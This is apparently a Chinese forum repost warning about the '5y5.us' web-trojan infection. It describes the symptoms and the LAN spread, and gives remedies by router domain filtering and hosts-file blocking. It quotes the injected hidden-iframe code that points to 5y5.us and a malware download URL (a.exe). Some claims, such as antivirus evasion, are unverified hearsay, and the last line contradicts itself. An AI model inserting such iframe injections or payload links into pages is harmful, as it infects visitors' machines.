此病毒还会在局域网传播。也就是,你家有10台电脑同用一条ADSL,其中一台中了,就会全部都中了。
现在微软还没发布补丁,建议少去不知名网站。小心中毒。。。
病毒中毒现象:打开任何网站时,会在你所打开的网站加载 一个地址,那地址就是 HTTP://5Y5.US
机器中毒时,不开网页不会没事,一但你开了,就加载了。特别要注意的事,打开网页是,要注意IE右下的的状态栏,一般打开网页右下出现完毕两个字的。如果中了5Y5,下边是一个三角符号的。
这个病毒会自动下载Http://5y5.us/a.exe这个病毒程序(Exploit.Win32.IMG-ANI.k),并启动MZKERNEL32.DLL进程,注意这个病毒已经做了免杀,无法被卡巴斯基杀掉,瑞星之类的就更别说了。
一下是转自网友的解决方法!
路由上面加入“域名过滤”,把5y5.us和7y7.us都加进去
想了想,5y5 类型应该是属于网页挂马。
所以做了过滤 进出都做,安全性至少有了不错的保障。
方法二:(转贴,个人感觉这个还是比较可行的。。。)
关于5y5.us:
在打开所有网页,都会自动加载以下代码:
Do you Qihoo?rame src=http://5y5.us/ width=100 height=0 frameborder=0></i-frame-X>
Do you Qihoo?rame src=http://5y5.us/2/002.htm width=0 height=0></i-frame-X> <html>
或http://5y5.us/1/1.jpg 等网址...
处理可以通过360安全卫士清除)
(1)立刻屏蔽那些域名的访问:
立刻关闭IE,然后用记本事打开:
C:\WINDOWS\system32\drivers\etc
下的,HOST文件...
在127.0.0.1 localhost下面,,换行,加上下面的地址:
127.0.0.1 5y5.us
127.0.0.1 www.5y5.us
127.0.0.1 www.7y7.us
127.0.0.1 7y7.us
127.0.0.1 ws91.com
127.0.0.1 www.ws91.com
保存就OK了,,访问那些网址,都不会转到127.0.0.1(本机IP)这个IP了..
